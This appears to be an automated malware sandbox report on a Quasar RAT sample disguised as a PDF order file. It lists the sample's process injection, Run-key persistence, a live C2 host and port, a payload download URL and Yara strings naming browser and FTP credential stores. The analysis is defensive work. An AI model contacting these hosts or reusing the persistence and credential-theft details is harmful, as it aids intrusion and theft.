Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order88983273293729387293828PDF.exe

Overview

General Information

Sample name:Order88983273293729387293828PDF.exe
Analysis ID:1557778
MD5:9c23449ea828b1d7d4473aa70f86caa8
SHA1:474136c0e6d3d7c00a2e4f1b1e41f831fbb6dcba
SHA256:7c9b4c774fbf907cf1858ea31454992e16d6b6521f880fcd8a12433ce25b6b35
Tags:exeuser-lowmal3
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Quasar RAT
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Order88983273293729387293828PDF.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\Order88983273293729387293828PDF.exe" MD5: 9C23449EA828B1D7D4473AA70F86CAA8)
    • InstallUtil.exe (PID: 5948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • windows update.exe (PID: 7100 cmdline: "C:\Users\user\AppData\Roaming\SubDir\windows update.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • conhost.exe (PID: 5832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • windows update.exe (PID: 1360 cmdline: "C:\Users\user\AppData\Roaming\SubDir\windows update.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 2796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • windows update.exe (PID: 4308 cmdline: "C:\Users\user\AppData\Roaming\SubDir\windows update.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

Threatname: Quasar

{"Version": "1.4.1", "Host:Port": "nwamama.ydns.eu:3791;", "SubDirectory": "SubDir", "InstallName": "windows update.exe", "MutexName": "3302836a-f2f9-4646-981e-42b54ed610dd", "Tag": "man", "LogDirectoryName": "Logs"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2233106739.0000000000720000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
    00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
      00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
          00000000.00000002.2252532940.00000000068C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Order88983273293729387293828PDF.exe.68c0000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.Order88983273293729387293828PDF.exe.40d6ed0.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                  0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpackMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
                  • 0x28d09d:$x1: Quasar.Common.Messages
                  • 0x29d3c6:$x1: Quasar.Common.Messages
                  • 0x2a9a16:$x4: Uninstalling... good bye :-(
                  • 0x2ab20b:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
                  0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
                  • 0x2a8fc8:$f1: FileZilla\recentservers.xml
                  • 0x2a9008:$f2: FileZilla\sitemanager.xml
                  • 0x2a904a:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
                  • 0x2a9296:$b1: Chrome\User Data\
                  • 0x2a92ec:$b1: Chrome\User Data\
                  • 0x2a95c4:$b2: Mozilla\Firefox\Profiles
                  • 0x2a96c0:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • 0x2fb644:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • 0x2a9818:$b4: Opera Software\Opera Stable\Login Data
                  • 0x2a98d2:$b5: YandexBrowser\User Data\
                  • 0x2a9940:$b5: YandexBrowser\User Data\
                  • 0x2a9614:$s4: logins.json
                  • 0x2a934a:$a1: username_value
                  • 0x2a9368:$a2: password_value
                  • 0x2a9654:$a3: encryptedUsername
                  • 0x2fb588:$a3: encryptedUsername
                  • 0x2a9678:$a4: encryptedPassword
                  • 0x2fb5a6:$a4: encryptedPassword
                  • 0x2fb524:$a5: httpRealm
                  Click to see the 12 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\SubDir\windows update.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 5948, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Svchost

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000002.00000002.2240428328.0000000003231000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "nwamama.ydns.eu:3791;", "SubDirectory": "SubDir", "InstallName": "windows update.exe", "MutexName": "3302836a-f2f9-4646-981e-42b54ed610dd", "Tag": "man", "LogDirectoryName": "Logs"}
                  Multi AV Scanner detection for submitted file
                  Source: Order88983273293729387293828PDF.exeReversingLabs: Detection: 36%
                  Yara detected Quasar RAT
                  Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2233106739.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 7092, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5948, type: MEMORYSTR
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: Order88983273293729387293828PDF.exeJoe Sandbox ML: detected
                  Source: Order88983273293729387293828PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                  Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: Order88983273293729387293828PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.000000000392B000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254840027.0000000007230000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.000000000392B000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254840027.0000000007230000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000002.00000002.2238847838.0000000001676000.00000004.00000020.00020000.00000000.sdmp, windows update.exe, 00000003.00000000.2232242455.0000000000472000.00000002.00000001.01000000.00000007.sdmp, windows update.exe.2.dr
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2238847838.0000000001676000.00000004.00000020.00020000.00000000.sdmp, windows update.exe, 00000003.00000000.2232242455.0000000000472000.00000002.00000001.01000000.00000007.sdmp, windows update.exe.2.dr
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 4x nop then jmp 0489EDC8h0_2_0489ECA8
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 4x nop then jmp 0489EDC8h0_2_0489ECB8
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 4x nop then jmp 0489EDC8h0_2_0489EE94

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: nwamama.ydns.eu
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /mansa/Vurfw.wav HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 185.78.221.73 185.78.221.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /mansa/Vurfw.wav HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: www.oleonidas.gr
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://entityframework-plus.net/
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2240428328.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: InstallUtil.exe, 00000002.00000002.2238847838.0000000001676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                  Source: Order88983273293729387293828PDF.exeString found in binary or memory: http://www.zzzprojects.com
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bulk-operations.net
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bulk-operations.net$Microsoft.Data.SqlClient.SqlBulkCopyEThe
                  Source: Order88983273293729387293828PDF.exeString found in binary or memory: https://bulk-operations.net/pricing.
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net#Oops
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping.
                  Source: Order88983273293729387293828PDF.exeString found in binary or memory: https://dapper-plus.net/pricing.
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/)
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/include-graph).
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/md5-exception
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/md5-exceptionX
                  Source: Order88983273293729387293828PDF.exeString found in binary or memory: https://entityframework-extensions.net/pricing.
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/
                  Source: Order88983273293729387293828PDF.exeString found in binary or memory: https://linqtosql-plus.net/pricing.
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oleonidas.gr
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oleonidas.gr/mansa/Vurfw.wav
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2

                  E-Banking Fraud

                  barindex
                  Yara detected Quasar RAT
                  Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2233106739.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 7092, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5948, type: MEMORYSTR

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                  Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                  Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: Order88983273293729387293828PDF.exe
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_0489C6A0 NtResumeThread,0_2_0489C6A0
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_0489B668 NtProtectVirtualMemory,0_2_0489B668
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_0489C698 NtResumeThread,0_2_0489C698
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_0489B660 NtProtectVirtualMemory,0_2_0489B660
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00F241200_2_00F24120
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00F2347B0_2_00F2347B
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00F2DE480_2_00F2DE48
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00F2DE380_2_00F2DE38
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_04897F300_2_04897F30
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_048930780_2_04893078
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_0489239D0_2_0489239D
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_0489A6F00_2_0489A6F0
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_048950880_2_04895088
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_048950980_2_04895098
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_048D5A500_2_048D5A50
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_048DBCF30_2_048DBCF3
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_048D5A4B0_2_048D5A4B
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072DF6580_2_072DF658
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072DE9D00_2_072DE9D0
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072C003E0_2_072C003E
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072C00400_2_072C0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0180EFE42_2_0180EFE4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_058593B02_2_058593B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_058505082_2_05850508
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_058505182_2_05850518
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.000000000293E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Order88983273293729387293828PDF.exe
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.000000000392B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2217629583.0000000000CBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Order88983273293729387293828PDF.exe
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Order88983273293729387293828PDF.exe
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Order88983273293729387293828PDF.exe
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Order88983273293729387293828PDF.exe
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Order88983273293729387293828PDF.exe
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000000.2128066751.0000000000452000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLhohepjghy.exe6 vs Order88983273293729387293828PDF.exe
